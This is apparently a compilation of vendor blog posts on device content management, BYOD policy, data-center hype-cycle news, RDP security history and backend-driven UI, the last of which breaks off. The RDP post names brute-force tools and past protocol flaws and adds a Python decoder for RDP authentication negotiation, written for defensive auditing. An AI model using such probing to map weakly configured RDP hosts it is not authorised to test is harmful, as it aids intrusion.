
Enhancing Content Management with Scalefusion FileDock for Windows Devices

Imagine you’re an IT administrator at a rapidly growing tech firm. Each day, you juggle the demands of securely managing and distributing a vast array of digital content across hundreds of devices; the pressure is constant.

According to a recent study, the global mobile content management market, valued at USD 2.48 billion in 2022, is projected to grow at a compound annual growth rate (CAGR) of 22.2% from 2023 to 2030[1]. In such a dynamic scenario, efficient content management is not just a luxury—it’s a necessity.

Windows content management

Enter Scalefusion FileDock, an innovative application designed to streamline content management on Windows devices. This powerful tool extends Scalefusion’s kiosk feature set, providing a secure gateway for IT admins to upload, manage, and distribute content seamlessly from a central dashboard.

This blog will explore how FileDock revolutionizes enterprise content management, its key features, and real-world applications. Discover how this essential tool can enhance your organization’s efficiency and security in the ever-evolving modern workspace.

What is Scalefusion FileDock?

Let’s understand the core concept of Scalefusion FileDock for Windows.

FileDock’s Primary Function

Scalefusion FileDock is an enterprise application designed to enhance content management on managed Windows devices. It serves as a secure gateway, allowing IT administrators to upload, manage, and distribute content directly from the Scalefusion dashboard to managed Windows devices. By integrating seamlessly with the Scalefusion ecosystem, FileDock ensures that any content uploaded via the Windows content management module is accessible only through the FileDock app on the device, maintaining high security and control over distributed content.

Core Features

a. Secure Content Upload and Distribution

FileDock provides a secure platform for uploading various types of content, including files, folders, presentations, and multimedia. Once uploaded, content is distributed over the air directly to the devices, ensuring that all data remains secure during transmission.

b. Content Categorization

FileDock categorizes content into different types such as documents, pictures, videos, music, and others. This categorization simplifies content organization and retrieval for end-users, allowing them to quickly find and access the necessary files.

c. User-friendly Interface

The FileDock application features an intuitive interface similar to traditional file explorers. It includes:

  • Menu Bar: Options to sync files, view logs, and access help.
  • Left Panel: Lists file categories.
  • Main Section: Displays the list of files based on selected categories.
  • Toolbar: Includes search, filter, and sync options.
  • Status Bar: Shows the total number of items and other relevant information.

d. Advanced Security Features

FileDock enhances security by restricting content sharing, applying file expiry settings, and supporting secure content distribution protocols. Administrators can define additional locations for file storage and set specific expiry periods to ensure content is automatically removed after a certain time.

e. Remote Management Capabilities

FileDock allows IT admins to manage content remotely, making it ideal for distributed work environments. Admins can push updates, publish new content, and manage existing files without needing physical access to the devices.

f. Presentation Mode for Digital Signage

In addition to content management, FileDock can run presentations and turn Windows devices into digital signage kiosks. This feature is useful for marketing and information dissemination in public spaces.

Content Management with FileDock

Let’s discover how you can efficiently manage content with FileDock.

1. Empowering IT Administrators

FileDock revolutionizes how IT administrators manage and distribute content across multiple devices from a centralized location. Using the Scalefusion dashboard, admins can effortlessly push new content, manage existing files, and update applications on all enrolled devices. This centralized control eliminates the need for physical access, making content management efficient and seamless.

2. Streamlined Content Delivery

FileDock allows IT admins to remotely transfer files to Windows desktops. This means that whether it’s a critical information update, a company-wide policy document, or training materials, admins can ensure that all devices receive the necessary content without delay. This capability is crucial for maintaining operational consistency and ensuring all users have the latest resources.

3. Real-Time Updates

One of the standout features of FileDock is the ability to perform real-time updates. This ensures that all managed devices are always up-to-date with the latest content. The endpoint users can access required content instantly with FileDock, avoiding unwanted delays.

4. Enhanced Security Protocols

FileDock places a strong emphasis on security, incorporating advanced protocols to safeguard sensitive information. Admins can control who has access to what content, setting permissions and restrictions to prevent unauthorized sharing or viewing. This is particularly important for protecting proprietary information and ensuring that sensitive data does not fall into the wrong hands.

5. Granular Control with File Expiry

To further enhance security, FileDock allows admins to set expiry dates for files. This means that content will automatically become inaccessible after a specified period, reducing the risk of outdated or sensitive information lingering on devices. This feature is particularly useful for managing temporary projects or time-sensitive information that should not remain accessible indefinitely.

6. Customized Download Locations

IT admins can define custom locations for downloading files, providing an additional layer of control over where data is stored. This flexibility allows organizations to enforce data storage and access policies, ensuring that files are stored in secure, approved locations and reducing the risk of data breaches.

7. Comprehensive Audit Trails

FileDock also supports comprehensive logging and audit trails, enabling IT admins to track all content-related activities. This includes who accessed which files, when updates were made, and any changes to permissions or settings. These logs are invaluable for maintaining accountability and ensuring compliance with regulatory requirements.

Real-world Applications of FileDock App

Scalefusion’s FileDock app provides numerous advantages to different industries. Let’s explore them one by one.

1. Healthcare

Managing sensitive patient information and ensuring regulatory compliance is crucial in healthcare. FileDock enables healthcare providers to securely distribute and manage patient records, treatment plans, and medical imaging files. Hospitals can push updated protocols to Windows devices, ensuring staff have immediate access to the latest information, improving patient care and streamlining operations.

2. Education

Educational institutions benefit by efficiently managing and distributing content to students and faculty. Universities can push curriculum updates, lecture notes, and multimedia content directly to students’ Windows laptops and desktops, ensuring consistent access to necessary resources and enhancing the learning experience.

3. Retail

Timely and accurate information is vital in retail. FileDock enables retail chains to manage and distribute product information, training materials, and promotional content to store computers. Retailers can push new product information and training videos to store devices simultaneously, ensuring employees are well-informed and providing a consistent customer experience.

4. Vehicle Fleet Management

Real-time data and updates are essential in vehicle fleet management. FileDock helps fleet managers distribute important information such as route changes, maintenance schedules, and compliance documents to vehicles equipped with Windows tablets or laptops. This improves operational efficiency and ensures the fleet operates within regulatory guidelines.

5. Corporate Offices

Large corporations can standardize communication and content distribution. FileDock allows businesses to push corporate policies, training materials, and announcements to all Windows desktops and laptops, ensuring every employee has access to the same information. This is particularly beneficial for compliance with company policies and onboarding new employees.

The Future is Now with Scalefusion FileDock

As the business landscape evolves, staying ahead requires tools that are not just functional but transformative. Scalefusion FileDock is not just another content management solution—it’s a gateway to a more efficient, secure, and streamlined way of handling your digital content assets. Imagine a world where every file, every update, and every piece of critical information is just a click away, securely delivered to all your devices, no matter where they are.

With Scalefusion FileDock, the future of content management is not just a possibility; it’s here. Embrace the power of seamless integration, strong security, and unparalleled efficiency. Ready to revolutionize how you manage content? The next step is yours to take.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Scalefusion
Scalefusion’s company DNA is built on the foundation of providing world-class customer service and making endpoint management simple and effortless for businesses globally. We prioritize the needs and feedback of our customers, making sure that they are at the forefront of all decision-making processes. We are dedicated to providing comprehensive customer support services, and place emphasis on customer-centric thinking throughout the organization.

How a BYOD Policy is Protecting Your Organization

As the digital landscape continues to evolve, organizations are increasingly adopting “Bring Your Own Device” (BYOD) policies. Allowing employees to use their personal devices for work fosters flexibility and boosts productivity. However, without a well-structured approach, BYOD can expose organizations to numerous cybersecurity risks. A strong BYOD policy is not just a set of guidelines; it’s a critical framework designed to protect sensitive data, mitigate threats, and ensure compliance. By recognizing the importance of a comprehensive BYOD policy, organizations can turn potential vulnerabilities into fortified defenses.

Understanding the Imperative for a BYOD Policy

In today’s increasingly mobile and remote working environments, the surge in BYOD adoption is both a boon and a bane for organizations. While employees relish the convenience and flexibility, these advantages are counterbalanced by heightened cybersecurity risks. Without a rigorous BYOD policy, personal devices can become conduits for cyber threats, jeopardizing organizational integrity.

A well-structured BYOD policy delineates clear guidelines for device usage, data access, and security protocols, establishing a mutual understanding of responsibilities. This clarity is pivotal in fostering a culture of accountability, wherein employees recognize the gravity of protecting sensitive information. Knowing the dos and don’ts, employees are less likely to inadvertently introduce vulnerabilities, though oftentimes employees use personal devices for work regardless of their organization’s rules or policies regarding BYOD.

Furthermore, a BYOD policy acts as a strategic framework for identifying and mitigating risks specific to personal devices. Different devices, operating systems, and applications present unique threats that must be meticulously assessed. With this granular understanding, organizations can implement tailored security measures that substantially reduce the risk of breaches.

Equally important is the policy’s role in harmonizing technological defenses with human behavior. An effective BYOD policy ensures that security measures are seamlessly integrated into daily operations, reinforcing the organization’s overall cybersecurity architecture. By embedding the BYOD policy into the core cybersecurity strategy, organizations can better prepare for and respond to increasingly sophisticated cyber threats, safeguarding their digital assets and operational continuity.

Mitigating Cyber Threats Through Stringent BYOD Measures

To bolster an organization’s defenses, a BYOD policy must encompass rigorous measures designed to mitigate cyber threats. Central to this strategy is the enforcement of strong authentication protocols. Mobile Device Management (MDM) solutions empower IT teams to remotely monitor, manage, and secure employee devices. 87% of companies rely on employee access to mobile business apps via personal smartphones. MDM facilitates the enforcement of encryption standards, the installation of critical security updates, and the remote wiping of data from lost or compromised devices. These capabilities are essential for ensuring that all personal devices adhere to the organization’s stringent security criteria.

Equally critical is the provision of comprehensive cybersecurity training for employees. Awareness training educates staff on recognizing potential threats such as phishing attempts and malware infections, fostering a culture of vigilance and proactive defense. By equipping employees with this knowledge, organizations fortify their cybersecurity posture, leveraging human awareness as a key component of their defense strategy.

Additionally, implementing endpoint protection measures, such as antivirus software and firewalls, is crucial in shielding personal devices from malware and other malicious attacks. Regular security audits and vulnerability assessments should be conducted to identify and rectify potential weak points within the BYOD framework. These stringent measures, when seamlessly integrated into a cohesive BYOD policy, create a fortified digital environment where both technological defenses and human awareness coalesce to safeguard organizational integrity against the ever-evolving landscape of cyber threats.

Aligning BYOD Policy with Cybersecurity Compliance Standards

In a regulatory environment where adherence to stringent standards is crucial, aligning a BYOD policy with prevailing cybersecurity compliance mandates is indispensable. Organizations are obligated to ensure their BYOD policies conform to rigorous frameworks such as the GDPR, HIPAA, and PCI DSS, among others. By embedding these regulatory requirements into the fabric of the BYOD policy, organizations can preemptively mitigate legal and financial risks.

Key elements such as data encryption, secure access controls, and stringent authentication measures are not just best practices but often legally mandated. These components, when integrated into the BYOD policy, not only bolster security but also ensure compliance with industry-specific regulations.

The dynamic nature of compliance requires that organizations adopt a continuous improvement mindset. Regular audits and evaluations of the BYOD policy are essential to maintain alignment with evolving regulatory landscapes and emerging cyber threats. This proactive stance allows organizations to stay ahead of compliance requirements while reinforcing their cybersecurity frameworks.

Additionally, organizations should consider the synergies between their BYOD policies and broader cybersecurity strategies. By creating a cohesive, compliance-driven approach, organizations can achieve a unified defense mechanism that simultaneously satisfies regulatory demands and fortifies their security posture. Integrating automation into compliance processes further enhances the ability to swiftly adapt to new regulations, thereby ensuring continuous adherence without compromising operational efficiency.

Leveraging Automation in Enforcing BYOD Policies

To keep pace with the escalating sophistication of cyber threats, automation must be integral to enforcing BYOD policies. Automated solutions elevate the efficiency and efficacy of managing personal devices by providing real-time visibility into device compliance. These systems can instantly identify non-compliant devices, prompting swift corrective actions that preclude potential security breaches.

Automation also enhances incident response capabilities. When a threat is detected, automated protocols can isolate affected devices, curtailing the spread of malicious activity and minimizing damage. This rapid response is crucial in maintaining organizational integrity against an ever-evolving threat landscape.

Further, automating updates and security patches ensures that all devices are continuously protected against the latest vulnerabilities. This eliminates the latency inherent in manual updates, which can expose the organization to unnecessary risks. By maintaining a state of perpetual readiness, organizations not only enhance their security posture but also make optimal use of their cybersecurity budgets.

The synergy between automation and BYOD policies extends to regulatory compliance as well. Automated systems can streamline adherence to various cybersecurity standards, ensuring that devices consistently meet compliance requirements. This not only reduces the administrative burden but also fortifies the organization’s defense mechanisms. Embracing automation in BYOD policy enforcement positions organizations to proactively counteract emerging threats, safeguarding their digital ecosystem while optimizing resource allocation. Factors such as the spread of 5G internet access and employee privacy concerns will affect how BYOD might change in the future.

Conclusion

A well-structured BYOD policy is essential for balancing flexibility and security in today’s digital landscape. By establishing clear guidelines, enforcing stringent security measures, and aligning with compliance standards, organizations can protect their sensitive data while fostering productivity. Automation further enhances these efforts by streamlining enforcement and response processes, ensuring that organizations remain agile in the face of evolving cyber threats. With the right BYOD strategy, businesses can turn potential vulnerabilities into opportunities for stronger, more resilient cybersecurity frameworks.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.

Scale Computing Named in 2024 Gartner® Hype Cycle™ for Data Center Infrastructure Technologies

INDIANAPOLIS – September 18, 2024 — Scale Computing, a market leader in edge computing, virtualization, and hyperconverged solutions, today announced it has been recognized as a Sample Vendor in the 2024 Gartner® Hype Cycle™ for Data Center Infrastructure Technologies. We feel this acknowledgment underscores Scale Computing’s commitment to delivering innovative solutions that address the evolving needs of modern data centers. 

As organizations increasingly embrace digital transformation, the demand for efficient, resilient, and sustainable data center infrastructure has never been greater. Gartner says, “By 2028, 40% of data center infrastructure will be managed through a cloud-based control plane, an increase from less than 15% in 2023. By 2028, more than 70% of enterprises will alter their data center strategies, due to limited energy supplies, a major increase from less than 5% in 2023.” The Gartner Hype Cycle report highlights the latest innovations designed to help IT leaders enhance business technology platforms and achieve these goals by devising sustainable, secure, scalable, agile, and resilient data center infrastructure at an acceptable cost.

“Scale Computing has long been dedicated to developing innovative solutions that empower businesses to meet their goals in an increasingly complex IT environment,” stated Jeff Ready, CEO and co-founder of Scale Computing. “We are honored to be recognized as a Sample Vendor in the 2024 Gartner Hype Cycle for Data Center Infrastructure Technologies, which provides a valuable framework for IT leaders to understand new technologies and their potential impact on their businesses. To us, this recognition validates our dedication to providing cutting-edge solutions that empower businesses to optimize their data center operations and drive digital innovation.”

Scale Computing Platform brings together simplicity and scalability, replacing existing infrastructure to empower enterprises to run applications and process data outside centralized data centers, at the edge of their networks, closest to where data is created and utilized. With Scale Computing Fleet Manager, the industry’s first cloud-hosted monitoring and management tool built for hyperconverged edge computing infrastructure at scale, customers can quickly identify areas of concern using a single pane of glass, scaling from 1 to over 50,000 clusters. Zero-touch provisioning enables administrators to centrally monitor and manage hundreds or thousands of distributed edge infrastructure deployments with minimal or no on-site IT personnel.

Gartner Hype Cycle reports provide a visual depiction of the maturity and adoption of applications and technologies, providing business leaders with a roadmap for understanding how these technologies are expected to evolve over time. The reports offer insights into the potential of emerging technologies within industries, allowing enterprises to assess their risk tolerance on an individual basis. IT leaders can leverage Hype Cycle reports to uncover the real drivers of a technology’s commercial promise, reduce the risk of technology investment decisions, and assess a technology’s business value objectively based on data from experienced IT analysts. The latest report covers the five phases in the Hype Cycle: Technology Trigger, Peak of Inflated Expectations, Trough of Disillusionment, Slope of Enlightenment, and Plateau of Productivity.

For complimentary access to the 2024 Gartner Hype Cycle for Data Center Infrastructure Technologies and to read the thoughts and expertise of the Gartner analysts who authored the report, visit the Scale Computing website.

Gartner, Hype Cycle for Data Center Infrastructure, by Henrique Cecci, Philip Dawson, 27 June 2024.

GARTNER is a registered trademark and service mark, and HYPE CYCLE is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

About Scale Computing
Scale Computing is a leader in edge computing, virtualization, and hyperconverged solutions. Scale Computing HC3 software eliminates the need for traditional virtualization software, disaster recovery software, servers, and shared storage, replacing these with a fully integrated, highly available system for running applications. Using patented HyperCore™ technology, the HC3 self-healing platform automatically identifies, mitigates, and corrects infrastructure problems in real-time, enabling applications to achieve maximum uptime. When ease-of-use, high availability, and TCO matter, Scale Computing HC3 is the ideal infrastructure platform. Read what our customers have to say on Gartner Peer Insights, Spiceworks, TechValidate and TrustRadius.

RDP security: The impact of secure defaults and legacy protocols

Microsoft’s Remote Desktop Services (RDS) is a commonly used technology for providing a remote Windows graphical environment. RDS use cases range from merely enabling remote server management all the way to providing full Virtual Desktop Infrastructure (VDI) for enterprises. In this blog, we’ll explore how the network-level security controls have evolved to address risks, why defaults can affect an environment’s security, and how to use runZero to audit your environment.

In the beginning (abridged) 

In 1995, before RDS, Citrix released a multi-user remote desktop product called WinFrame, based on Windows NT 3.51. This was promising enough that Microsoft later licensed the core technology from Citrix and used it to build a product called Terminal Services. It was first released in 1998 as Windows NT 4.0 Terminal Server Edition. In Windows 2000, Terminal Services became a standard Windows feature. After that, nearly every version of Windows Server improved on RDS in some way.

The network protocol used for communication between the RDS client and server is called Remote Desktop Protocol (RDP). The protocol evolved alongside the RDS changes and was the impetus for various improvements. Many of the security controls discussed in this blog are changes to RDP.

Not remotely secure

It will likely surprise no one that a protocol and corresponding implementations from the 1990s and early 2000s had security problems. The impact of these problems grew over time as more organizations started exposing the RDS services directly on the Internet. Some organizations were doing this to enable remote management of servers while others were hosting applications and other services for clients.

The major issues that we’re going to cover here are:

Information disclosure

When a client connected to RDS, it was presented with a login screen. By default, the login screen often displayed a list of recent users and the Windows domain or Active Directory domain that the server was a member of. This information could then be used in brute force attacks.

FIGURE 1 – Legacy RDS pre-login screen

Brute force attacks

The client side of the RDP protocol required minimal resources, and there were no controls in place to stop attackers from using tools such as Hydra or Ncrack to test username and password combinations in order to discover valid credentials. While administrators could configure Windows policies to lock out accounts after a certain number of failed login attempts, this precaution often wasn’t enforced for Administrator accounts – admins always had login access.

Denial of service

During the initial client connection and prior to authentication, the server provisioned an entire desktop environment before beginning the login process. This meant that attackers could easily create a resource-exhaustion situation by simply opening a large number of sessions. This could happen accidentally as part of an effort to brute force credentials.

Machine-in-the-Middle

The early versions of RDP were susceptible to Machine-in-the-Middle (MitM) attacks that could enable decryption or modification of RDS session data. They used a form of authentication that is now known to have many weaknesses. The encryption used was a stream cipher named RC4. At the time RC4 was commonly used in various protocols such as WEP, WPA, SSL, and TLS. Today, however, it is known to be broken by multiple techniques, and the key sizes are such that modern computers make short work of them. It became so risky that RFC 7465 was published in 2015 to prohibit RC4’s use in all TLS versions. Further compounding the RDS risks, RDP allowed key sizes as small as 40 bits in order to comply with US cryptographic export restrictions.

The issues with authentication didn’t end there. Microsoft’s implementation of the key exchange protocol depended on the client and server creating and exchanging random values. The server’s random value was sent unencrypted over the network. The server also provided a public RSA key that could be used by the client to encrypt the client’s random value so that only the server could read it. Unfortunately, Microsoft baked the same public-private RSA key pair into every RDS host. This key was, predictably, extracted and made public. With that information attackers with network access to RDS communications could decrypt the data and extract authentication and session information. Advanced attackers in the correct network position could intercept and monitor or modify an RDS session in real time.

Shoring up defenses

With the release of Windows 2003 Service Pack 1, Microsoft introduced the ability to use TLS, which addressed the issue of machine-in-the-middle (MitM) attacks by enabling the use of significantly more robust encryption cipher suites and key exchange protocols. This also enabled the protocol to take advantage of improvements in TLS over time instead of being locked into a single algorithm. Additionally, TLS allows clients to cryptographically verify they were connecting to the expected server.

In Windows Server 2008, Microsoft introduced Network Level Authentication (NLA), which required users to authenticate themselves before a session would be established. NLA forced authentication to occur after the TLS handshake but before the console was provisioned, which mitigated the resource-exhaustion concerns, reduced information leakage, and significantly impaired brute-force attacks. Since information leakage was reduced, attackers could no longer collect the names of users, but they could still obtain the Windows hostname and domain information via the CredSSP authentication process. This is still an overall improvement in security. There is one downside to requiring NLA – users can no longer authenticate and change expired passwords. This functionality has to be provided via another mechanism such as a Remote Desktop Gateway.

When configuring RDS in Windows Server 2008, administrators had the option to require NLA for all connections or to allow the client to decide. Starting with Windows Server 2012, however, NLA was required by default to improve security across Windows environments.

Real world impact of NLA by default

We explored our data to determine whether requiring NLA by default had a real-world impact. In other words, do we see a significant percentage of assets where a less secure option has been enabled on Windows Server 2012 and beyond?

The chart below shows the overall percentage of specific Windows operating systems (OS) in our data as well as the breakdown of NLA enforcement for each.

FIGURE 2 – Operating system distribution for RDP NLA enforcement.

As the results illustrate, the majority of RDS on Windows Server versions where NLA is required by default do, in fact, require NLA. This is great news. It indicates that secure defaults can have a positive impact on security posture. Another takeaway is that more modern environments are less likely to have operational or compatibility requirements that force less secure configurations. An argument could be made that the NLA requirement being disabled by default on Windows Server 2008 / 2008 R2 shows up in the results as well, but this state may also be influenced by those servers being more likely to have legacy or third-party clients that don’t support NLA.

We also reviewed the OS distribution of services that did not permit using NLA at all. This list is dominated by Red Hat Enterprise Linux and its various derivatives running the xrdp RDP service. The xrdp service does not currently support NLA, so these results are not surprising. However, we were encouraged to find so few results for Microsoft Windows machines without NLA support that the number is not statistically significant.

FIGURE 3 – Operating system distribution for RDP without NLA support.

Using runZero to audit RDP configurations

At runZero we put a tremendous amount of effort into trying to extract as much information from scan targets as possible, particularly if the information can help us understand the security posture of the device. For RDS services this includes enumerating all of the RDP authentication mechanisms that the target supports. Explore our recommendations to audit RDP configurations in your environment.

Attributes of interest

We store RDP authentication attributes on the RDP service of an asset with the prefix rdp.auth. Here are the attributes that can be used to audit your environment to check to see if NLA is enabled or required as well as if standard, legacy RDP authentication is still enabled:

  • rdp.auth.nla – a value of supported indicates that the target supports NLA (this is good!).

  • rdp.auth.rdp – a value of supported indicates that the target still allows authentication using the legacy RDP mechanism. (Red flag. It should only really be required if you have very old clients that still need to connect).

  • rdp.auth.ssl – a value of supported indicates that the target still allows authentication using TLS alone. (Somewhere in the middle. This is better than legacy RDP but still weaker than NLA).

In rdp.auth.rdp and rdp.auth.ssl a value of ERROR_HYBRID_REQUIRED_BY_SERVER indicates that the authentication mechanism is not supported and NLA is required. This is the desired state.

Within runZero you can use a Service inventory search to audit your environment. To find assets supporting legacy RDP authentication you can use the following search criteria:

protocol:rdp and _service.rdp.auth.rdp:="supported"

To find assets supporting either legacy RDP or SSL the following Service inventory search criteria can be used:

protocol:rdp and (_service.rdp.auth.rdp:="supported" OR _service.rdp.auth.ssl:="supported")
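The same audit can be reproduced offline from the raw protocol negotiation. The block below is an added example in Python, not runZero’s code: it decodes the server side of RDP security-protocol negotiation (an X.224 Connection Confirm carrying an RDP_NEG_RSP or RDP_NEG_FAILURE structure, as documented in MS-RDPBCGR) for each of the three protocols a client can request, derives rdp.auth.rdp, rdp.auth.ssl and rdp.auth.nla values from the replies, and applies predicates equivalent to the two Service inventory searches above. The sample replies are constructed byte strings, not scanner output; the value "unsupported" for a protocol a server declines without a failure code is this example’s own convention, and how runZero actually probes and records results is not shown here.

```python
import struct

# Security protocols a client may request in RDP_NEG_REQ (MS-RDPBCGR).
PROTOCOL_RDP = 0x00000000     # legacy "standard RDP security" (RC4, built-in RSA key)
PROTOCOL_SSL = 0x00000001     # TLS without NLA
PROTOCOL_HYBRID = 0x00000002  # TLS + CredSSP, i.e. NLA

TYPE_RDP_NEG_RSP = 0x02      # server accepted one of the requested protocols
TYPE_RDP_NEG_FAILURE = 0x03  # server refused, with a failure code

# RDP_NEG_FAILURE failureCode values from MS-RDPBCGR.
FAILURE_CODES = {
    0x01: "ERROR_SSL_REQUIRED_BY_SERVER",
    0x02: "ERROR_SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "ERROR_SSL_CERT_NOT_ON_SERVER",
    0x04: "ERROR_INCONSISTENT_FLAGS",
    0x05: "ERROR_HYBRID_REQUIRED_BY_SERVER",
    0x06: "ERROR_SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}

def decode_negotiation(requested, tpkt):
    """Turn one probe into an rdp.auth.* value.

    `requested` is the protocol the client asked for; `tpkt` is the server's
    TPKT-framed X.224 Connection Confirm. "unsupported" for a protocol that is
    declined without a failure code is this example's own convention.
    """
    if len(tpkt) < 11 or tpkt[0] != 0x03:
        raise ValueError("not a TPKT-framed X.224 PDU")
    if struct.unpack(">H", tpkt[2:4])[0] != len(tpkt):
        raise ValueError("TPKT length does not match data")
    li = tpkt[4]                        # X.224 length indicator
    if (tpkt[5] & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    neg = tpkt[11:5 + li]               # rdpNegData after the 6-byte fixed part
    if not neg:
        # No negotiation structure at all: a server that only speaks legacy RDP.
        return "supported" if requested == PROTOCOL_RDP else "unsupported"
    if len(neg) < 8:
        raise ValueError("truncated RDP negotiation structure")
    ntype, _flags, nlen, value = struct.unpack("<BBHI", neg[:8])
    if nlen != 8:
        raise ValueError("bad RDP negotiation length")
    if ntype == TYPE_RDP_NEG_RSP:
        return "supported" if value == requested else "unsupported"
    if ntype == TYPE_RDP_NEG_FAILURE:
        return FAILURE_CODES.get(value, "ERROR_UNKNOWN_0x%08X" % value)
    raise ValueError("unexpected negotiation type 0x%02X" % ntype)

def rdp_auth_attributes(responses):
    """Combine three probes (one per protocol) into the attribute names used above."""
    return {
        "rdp.auth.rdp": decode_negotiation(PROTOCOL_RDP, responses[PROTOCOL_RDP]),
        "rdp.auth.ssl": decode_negotiation(PROTOCOL_SSL, responses[PROTOCOL_SSL]),
        "rdp.auth.nla": decode_negotiation(PROTOCOL_HYBRID, responses[PROTOCOL_HYBRID]),
    }

# Audit predicates matching the two Service inventory searches.
def allows_legacy_rdp(attrs):
    return attrs.get("rdp.auth.rdp") == "supported"

def allows_legacy_or_ssl(attrs):
    return allows_legacy_rdp(attrs) or attrs.get("rdp.auth.ssl") == "supported"

def requires_nla(attrs):
    """The desired state: NLA works and both weaker mechanisms are refused."""
    refused = "ERROR_HYBRID_REQUIRED_BY_SERVER"
    return (attrs.get("rdp.auth.nla") == "supported"
            and attrs.get("rdp.auth.rdp") == refused
            and attrs.get("rdp.auth.ssl") == refused)

# Constructed sample replies (not captures): TPKT + X.224 CC + optional rdpNegData.
def make_cc(neg=b""):
    body = bytes([6 + len(neg), 0xD0, 0x00, 0x00, 0x12, 0x34, 0x00]) + neg
    return b"\x03\x00" + struct.pack(">H", 4 + len(body)) + body

def neg_rsp(selected):
    return struct.pack("<BBHI", TYPE_RDP_NEG_RSP, 0, 8, selected)

def neg_failure(code):
    return struct.pack("<BBHI", TYPE_RDP_NEG_FAILURE, 0, 8, code)

HARDENED_HOST = {    # NLA required: rdp and ssl probes both get failure code 5
    PROTOCOL_RDP: make_cc(neg_failure(0x05)),
    PROTOCOL_SSL: make_cc(neg_failure(0x05)),
    PROTOCOL_HYBRID: make_cc(neg_rsp(PROTOCOL_HYBRID)),
}
PERMISSIVE_HOST = {  # everything still enabled: the red-flag case
    PROTOCOL_RDP: make_cc(neg_rsp(PROTOCOL_RDP)),
    PROTOCOL_SSL: make_cc(neg_rsp(PROTOCOL_SSL)),
    PROTOCOL_HYBRID: make_cc(neg_rsp(PROTOCOL_HYBRID)),
}

if __name__ == "__main__":
    for name, host in (("hardened", HARDENED_HOST), ("permissive", PERMISSIVE_HOST)):
        attrs = rdp_auth_attributes(host)
        print(name, attrs, "legacy:", allows_legacy_rdp(attrs),
              "legacy_or_ssl:", allows_legacy_or_ssl(attrs),
              "nla_required:", requires_nla(attrs))
```

The predicates are deliberately strict: a host only counts as requiring NLA when the hybrid probe succeeds and both the legacy and TLS-only probes come back with ERROR_HYBRID_REQUIRED_BY_SERVER, which is the state the text calls desired.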

A glance into the near future

An interesting recent development is the introduction of Remote Desktop (using the RDP protocol) to both the Gnome and KDE desktop environments. In both cases Remote Desktop is a full fledged, native feature. Based on the currently released code, it appears that the implementations support NLA and do not support either the legacy RDP or SSL protocols. We will be monitoring the growth of these implementations over time and look forward to sharing more insight on that in the future.

Final Thoughts

Thankfully, the security of Microsoft’s RDS has improved over time. As with many such improvements, the benefits are lost if the new features are not implemented. In this case, Microsoft made the pragmatic decision for the most secure option to also be the default and we can measure the real world impact. In short, secure-by-default matters.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

Backend-driven UI: Fast A/B testing and unified clients

As a Senior Frontend Engineer at NordLayer, I recently dove into BDUI to see what makes it stand out. In this article, I’ll break down where UI development is now and how adding more server-side power could improve the usual frontend-focused methods.

Frontend-only UI development

Imagine a simple UI feature, like the banner at the top of a page. How does our team create this banner? Let’s take a look at the 6-step development lifecycle for a single feature. 

A basic development cycle for a UI feature.

Development starts with requirement gathering, where the product owner (PO) outlines the desired functionality of the UI element. In this case, we want it to display a static message. So we design the banner, and as it’s a frontend-only feature, we may skip backend development and go straight into frontend development, then testing. After that, there’s only one step left – deployment. That’s it – the job’s done…

… or is it?

Emphasizing the backend’s role

Let’s say this whole process takes a week, depending on your setup. But features don’t simply stay the same indefinitely – we iterate upon them.

For example, we’d like to show a different message for the second iteration. However, realizing that the message will change a lot, we’d move its management to the backend. To ensure a smooth integration between departments, the backend engineers build an API and provide it to the frontend team. After testing and deployment, everything’s ready to go.

Let’s iterate further. Now we want to deliver tailored messages to different user segments, as part of an A/B testing strategy. The beautiful part? No more frontend changes required! The frontend’s role now is simply to call the backend to retrieve the display message. Our UI approach is now effectively ‘backend-driven,’ enabling faster iterations and more flexible content management and delivery.

The goal of backend-driven UI

Simply stated, backend-driven UI aims to make user interfaces a function of state.

Spotify expressed BDUI as UI = fn(state) in one of its early talks on the subject. This distills the idea beautifully. What we’re trying to achieve here is making the interface depend entirely on the state provided to it. Imagine a webpage structured using JSON data objects, which in our case, become the state. Each object represents a component on the frontend client. 

A mobile UI defined by JSON components.

The benefits of backend-driven UI

  • Redesigning our interface becomes streamlined: This can be achieved by simply changing the order of our objects. We can also add components without any frontend redeployment.

